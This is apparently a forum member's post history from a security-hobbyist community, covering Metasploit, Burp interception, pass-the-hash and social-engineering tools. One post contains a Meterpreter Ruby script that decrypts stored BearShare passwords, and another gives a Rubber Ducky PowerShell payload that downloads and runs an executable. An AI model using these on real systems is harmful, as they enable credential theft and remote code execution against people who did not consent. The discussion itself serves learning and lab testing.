mubix
-
Posts
516 -
Joined
-
Last visited
-
Days Won
3
Posts posted by mubix
-
-
Easiest way is to use Brup proxy to man in the middle all web traffic. Here are some tutorials how:
http://carnal0wnage.attackresearch.com/2010/11/iphone-burp.html
http://portswigger.net/burp/help/proxy_options_installingcacert.html#iphone
You can check in side SSL with that setup. If it's not web and it's using some other protocol you may be out of luck, but good chance that it's using HTTP or HTTPS
-
If you still have the ability to login as that user, forced password change or not, I think you should still be able to decrypt the password. I forced a password change from one administrator account to the other and once logged in (as the user with bearshare installed) still able to decrypt the bearshare password
-
Ya, it was password stored in the users store. Wrote a quick script to decrypt: (mostly stolen from post/windows/gather/credentials/outlook.rb)
def prepare_railgun rg = session.railgun if (!rg.get_dll('crypt32')) rg.add_dll('crypt32') end end def decrypt_password(data) rg = session.railgun pid = client.sys.process.getpid process = client.sys.process.open(pid, PROCESS_ALL_ACCESS) mem = process.memory.allocate(128) process.memory.write(mem, data) if session.sys.process.each_process.find { |i| i["pid"] == pid} ["arch"] == "x86" addr = [mem].pack("V") len = [data.length].pack("V") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 8) #print_status("#{ret.inspect}") len, addr = ret["pDataOut"].unpack("V2") else addr = [mem].pack("Q") len = [data.length].pack("Q") ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, nil, nil, nil, 0, 16) len, addr = ret["pDataOut"].unpack("Q2") end return "" if len == 0 decrypted_pw = process.memory.read(addr, len) return decrypted_pw end def get_valdata(k, name) @key_base = 'HKCU\\Software\\BearShare\\Users\\superuser@mailinator.com' registry_getvaldata("#{@key_base}\\#{k}", name) end prepare_railgun data = get_valdata("",'Password') print_error data.inspect password = decrypt_password(data) print_status password.inspect
And got the following output when logged in as Administrator (who installed Bearshare) and with the password of 'password'
meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] "password\x00"
I then exported the entire registry tree for Bearshare and moved it to a new user 'bob', importing it as it was from Administrator:
meterpreter > run decrypt_bearshare [-] "\x01\x00\x00\x00\xD0\x8C\x9D\xDF\x01\x15\xD1\x11\x8Cz\x00\xC0O\xC2\x97\xEB\x01\x00\x00\x00\xEC\x01\xFB\x97\x80\xD7qF\x95\xA76b&\xC87U\ x00\x00\x00\x00 \x00\x00\x00E\x00n\x00c\x00r\x00y\x00p\x00t\x00e\x00d\x00S\x00t\x00r\x00i\x00n\x00g\x00\x00\x00\x03f\x00\x00\xA8\x00\x00\x0 0\x10\x00\x00\x00\x10\x97\xE4\xA5m\xCD\x85PI\xC67\x1Da\xB4\xBB<\x00\x00\x00\x00\x04\x80\x00\x00\xA0\x00\x00\x00\x10\x00\x00\x00\x06\xC8\x01 \x9C\xB7I\x10BL\x14{\x9D\xF5\xECp\a\x10\x00\x00\x00\xD8\xF4\vB\xE8(\xFB^\xF2\x9F\x10\xFC>cnG\x14\x00\x00\x00\xC5z\a\xD3?\xD7\xDEz0\x0E\xD8\ x9E\xC11.d\x96\x95 \xC6" [*] ""
No joy (as expected)
-
I would like to 2nd that one ;)
-
I would start with SET (Social Engineering Toolkit) and look at how it does things. There is also SEF (Social Engineering Framework), MetaPhish, and Spear Fishing Toolkit. I think there is also one called FBPwn but I think it's just Java Applet + Facebook.
-
Check out Metasploit 'signed_java_applet' module. Pretty straight forward. After that you can either use Metasploit to host it or pull that Jar file down and host it anywhere you want with the APPLET tag.
-
An easy way is to just put the text file next to the Jar, and specify it that way. So put everything in the same directory. Hold shift and right click so you get the "Open Command WindowHere" option. Click it, then just run:
java -jar duckencode.jar -i myevilstuff.txt
-
My personal preference is pfSense. BSD based, fast and easy to use. And I have it running on an embedded system currently so I doubt you'll have any problems running it on anything you want.
-
I recently added a Ducky payload to the page http://www.usbrubber...ll_wget_execute :
Interested in what you guys think.
GUI r DELAY 100 STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe" ENTER
-
Anyone happen to grab the script before it was discontinued that doesn't mind sharing? The video looked pretty awesome of it's capabilities.
-
Nice work, but why are you using Metasploit on windows? Try it out on Backtrack or install it on Ubuntu. You'll get 10x the performance, even in a VM
-
Hi
Im using armitage and metasploit.
Im trying to attack windows vista machine at my home. the target machine is mine.
Only machine that I have been able to attack and gain access is windows 2000.
So what exploits should I use. Please help me, Im just trying to learn to use metasploit.
What is the machine vulnerable to? What patches have been applied? Are your looking to do a completely remote attack against an unused fresh build of Vista? You can try 09_050. Might work.
-
I agree, but it's really hard to fit that into a segment, even 4. People devote days to training even the basics.
-
I have a lot of work to do on camera, and hopefully that is something that I can keep gettng better at going forward. That's very cool that you're working in bio exploitation. Which field?
I have a make up metasploit segment in the queue, it's really hard to know when you aren't up to par when there s no one to give you instant feedback now that there is no hakhouse..
-
You can use pass-the-hash, where you don't know the password, but you have the hash. Many organizations use the same password for the local admin on all the boxes in an environment, as a NTLM or LM hash is the same for the same password no matter what box you have the account on, that hash can act just like the password.
-
How's the project coming along?
-
Here is a quick link to some tutorials on how to progress:
http://www.room362.com/mubixlinks/2009/12/...g-tutorial.html
-
Hahaha shit... Yeah that is from Mubix. Probably the worst guest the show keeps bringing back. Are you fucking kiding me? I assume Mubix is part of a team. I assume they're brining unpublished she-at to the table, nope. They're jusy making a tag line to attract hack-forum members.
Thanks for the constructive critisim. What don't you like about it?
-
Geohot recently cracked open the PS3, so I hope a bunch more coding efforts will start to emerge, but as of right now there really isn't much in the way of truely utilizing the CELL processor. Check out some of the PS3 hack pages to try and find some coding suggestions.
-
Hands down the best block list site that I use is:
-
Thats an awesome source of lists. Thanks!
-
check out the following links, this is much easier to configure.
How's your experience been with Iodine? I've found Ozyman a bit more stable, but ya, definitely Iodine is easier.
-
Episode 5x22
in Hak5
I can't believe Mubix was so rude about Mac OS X not being a 'proper platform', it kind of undermined any respect he may have built up in previous episodes, he just sounded like a 14 year old script kid.Mac OS X doesn't allow access to /dev/mem presumably for security reasons.
It was all in fun. I will actually be obtaining my first Mac in the not so distant future. I apologize if my comment offended you or any way hindered your respect for me.
-
ServifyThis
in Hak5
I just saw a post on mubix' blog in which he mentioned ServifyThis (hxxp://www.inguardians.com/pubs/servifythis/). It looks an interesting tool and maybe could be featured in a future episode?I love the tool and I think that's an awesome idea.
Meterpreter - what lasting effect does it have on a system?
in Security
Posted
Honestly these guys covered it really well. Technically Meterpreter itself operates only in memory. So really the only effect it has is when memory is referenced / accessed / or stored (ie. System Profiling software, Normal process execution, and Hibernate respectively). The more evident parts come in a few flavors:
These are just a small number of questions, and many you can ask in a lab. Run SecurityOnion's live CD, with a pfSense firewall running Squid, put an XP VM behind them and toss your Social Engineering payload at it with your attack C2 outside of it. Use Sys Internals Process Monitor on the victim. Make sure Bro, and all the other gadets and gizmos SecurityOnion has are enabled and in-line.
I guarantee you'll learn a ton just setting everything up, and a ton more once you test out your first SE.